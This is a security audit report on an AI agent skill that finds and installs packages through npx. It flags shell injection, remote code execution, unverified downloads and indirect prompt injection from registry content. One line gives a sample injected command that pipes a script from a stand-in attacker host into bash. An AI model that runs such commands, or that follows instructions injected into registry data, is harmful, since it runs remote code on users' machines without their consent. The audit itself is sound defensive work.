find-skills
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH
Findings: COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill routinely executes shell commands (`npx skills find [query]`, `npx skills add <package>`) where the arguments are derived directly from user input. This creates a significant risk of shell injection (e.g., inputting `react; curl http://attacker.com/malicious.sh | bash`) if the agent does not strictly sanitize the input string before execution.
- [REMOTE_CODE_EXECUTION] (HIGH): The skill automates the installation of executable packages using the `npx skills add` command. The recommendation to use the `-y` flag (Step 4) is particularly dangerous as it bypasses all user confirmation prompts, allowing the agent to silently install and execute code from remote sources.
- [EXTERNAL_DOWNLOADS] (HIGH): The skill is designed to fetch code from arbitrary GitHub repositories and npm. While the documentation mentions trusted sources like `vercel-labs`, the mechanism itself allows for the installation of any unverified third-party package, which could contain malware or backdoors.
- [PROMPT_INJECTION] (HIGH): As a discovery tool for external content (Category 8), this skill is highly vulnerable to Indirect Prompt Injection. It ingests data from an external registry (`skills.sh`) where attackers could host malicious skill descriptions designed to hijack the agent's reasoning or trick it into installing malicious code.
- Ingestion points: Search results from `npx skills find` and repository metadata.
- Boundary markers: None specified for separating search result content from agent instructions.
- Capability inventory: Shell execution, package installation, global system modification (`-g`).
- Sanitization: No sanitization or validation of the remote skill content is described.
Recommendations
- AI detected serious security threats
Audit Metadata